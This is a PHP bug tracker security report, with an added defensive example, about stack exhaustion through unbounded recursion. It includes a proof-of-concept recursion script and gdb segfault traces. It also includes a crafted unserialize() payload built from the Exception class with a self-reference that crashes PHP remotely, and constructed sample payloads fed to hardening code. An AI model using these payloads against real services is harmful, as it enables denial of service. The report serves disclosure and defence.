Sec Bug #69793 Remotely triggerable stack exhaustion via recursive method calls
Submitted: 2015-06-10 16:42 UTC Modified: 2015-08-04 22:20 UTC
From: andrea dot palazzo at truel dot it Assigned:
Status: Closed Package: Class/Object related
PHP Version: Irrelevant OS: Ubuntu x86_64
Private report: No CVE-ID:
 [2015-06-10 16:42 UTC] andrea dot palazzo at truel dot it
Description:
------------
Hello guys,
I marked this one as "security" because the crash is remotely triggerable (via unserialize()), so I thought you might not want it public; it doesn't seem to be exploitable though.

The problem lies in how recursive method calls are handled: the number of nested calls a method could perform to itself doesn't seem to be limited, causing an infinite recursion that would result in invalid memory read access due to stack exhaustion.

The POC is trivial:

<?php

class Dummy {

  // Unbounded self-recursion: nothing in the engine stops it, so the
  // C stack is eventually exhausted and the process crashes.
  public function recursion() {
    $this->recursion();
  }

}

$x = new Dummy;
$x->recursion();

?>

(gdb) r rec.php
Starting program: /usr/bin/php rec.php

Program received signal SIGSEGV, Segmentation fault.
zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h:592
592	in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h

Unfortunately, this is also triggerable remotely by crafting a special serialized object, also using only built-in classes like:

<?php

$e = unserialize('O:9:"Exception":7:{s:17:"'."\0".'Exception'."\0".'string";s:1:"a";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";R:1;s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";i:10;s:10:"'."\0".'*'."\0".'message";N;}');

var_dump($e."");

?>

(gdb) r exception.php 
Starting program: /usr/bin/php exception.php

Program received signal SIGSEGV, Segmentation fault.
zend_parse_va_args (num_args=num_args@entry=0, type_spec=0xb0776b "", 
    va=va@entry=0x7fffff7ff058, flags=flags@entry=0)
    at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c:827
827	in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c

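As an added example (not code from this report or from php-src), the following shows the userland hardening a defender can apply on the consuming side for both cases above: an explicit allow-list for unserialize() (the allowed_classes option, available since PHP 7.0), a __wakeup() that rejects property shapes a trusted serializer would never produce (the same idea as the fix commit's "limit what we accept when unserializing"), and a depth cap plus cycle check in the recursive traversal so a self-reference like the R:1 in the crafted payload raises an exception instead of recursing until the stack is gone. The class Node, safe_unserialize(), MAX_DEPTH and all sample payloads are hypothetical and constructed for this example; it needs PHP 7.1 or later.

```php
<?php
// Added example, not code from the bug report or from php-src.
// Names (Node, safe_unserialize, MAX_DEPTH) are hypothetical.
// Requires PHP 7.1+ (allowed_classes, nullable types, void).
declare(strict_types=1);

final class Node
{
    const MAX_DEPTH = 64;        // cap on traversal depth (assumed value)

    public $label = '';
    public $next  = null;        // expected: null or another Node

    public function __construct(string $label, ?Node $next = null)
    {
        $this->label = $label;
        $this->next  = $next;
    }

    // Runs after unserialize() has filled in the properties. Reject any
    // shape a trusted serializer would never have produced.
    public function __wakeup(): void
    {
        if (!is_string($this->label)) {
            throw new UnexpectedValueException('Node::$label must be a string');
        }
        if ($this->next !== null && !$this->next instanceof Node) {
            throw new UnexpectedValueException('Node::$next must be null or a Node');
        }
    }

    // Walk the chain with an explicit depth cap and a visited set, so a
    // self-reference (R:1 in a payload) or an over-long chain raises an
    // exception instead of recursing until the stack is exhausted.
    public function describe(int $depth = 0, ?SplObjectStorage $seen = null): string
    {
        $seen = $seen ?? new SplObjectStorage();
        if ($depth > self::MAX_DEPTH) {
            throw new RuntimeException('Node chain deeper than ' . self::MAX_DEPTH);
        }
        if ($seen->contains($this)) {
            throw new RuntimeException('cycle detected in Node chain');
        }
        $seen->attach($this);
        $out = $this->label;
        if ($this->next !== null) {
            $out .= ' -> ' . $this->next->describe($depth + 1, $seen);
        }
        return $out;
    }
}

// Only instantiate classes on an explicit allow-list; any other class in
// the payload becomes __PHP_Incomplete_Class and never runs __wakeup() or
// __toString().
function safe_unserialize(string $data, array $allowed)
{
    $value = @unserialize($data, ['allowed_classes' => $allowed]);
    if ($value === false && $data !== serialize(false)) {
        throw new UnexpectedValueException('malformed serialized data');
    }
    return $value;
}

// Constructed sample payloads (not taken from the report):
$samples = [
    'valid'       => serialize(new Node('a', new Node('b'))),
    'wrong type'  => 'O:4:"Node":2:{s:5:"label";s:1:"a";s:4:"next";i:10;}', // next is an int
    'self ref'    => 'O:4:"Node":2:{s:5:"label";s:1:"a";s:4:"next";R:1;}',  // next is the object itself
    'other class' => 'O:9:"Exception":1:{s:10:"' . "\0" . '*' . "\0" . 'message";N;}',
];

foreach ($samples as $name => $payload) {
    try {
        $v = safe_unserialize($payload, ['Node']);
        if ($v instanceof Node) {
            echo "$name: " . $v->describe() . "\n";
        } else {
            echo "$name: got " . get_class($v) . ", not instantiated as a live object\n";
        }
    } catch (Throwable $t) {
        echo "$name: rejected (" . get_class($t) . ': ' . $t->getMessage() . ")\n";
    }
}
```

Running it prints the valid chain as "a -> b", rejects the integer-typed next in __wakeup(), rejects the self-referencing payload in describe() via the visited set, and leaves the Exception payload as a __PHP_Incomplete_Class because it is not on the allow-list. The allow-list is the layer that matters most: it means a crafted payload cannot reach the methods of arbitrary built-in or library classes at all, and the __wakeup() validation covers the classes you do choose to accept.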
History

 [2015-08-04 22:22 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4d2278143a08b7522de9471d0f014d7357c28fea
Log: Fix #69793 - limit what we accept when unserializing exception
 [2015-08-04 22:22 UTC] stas@php.net
-Status: Open +Status: Closed
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Mar 28 19:01:48 2017 UTC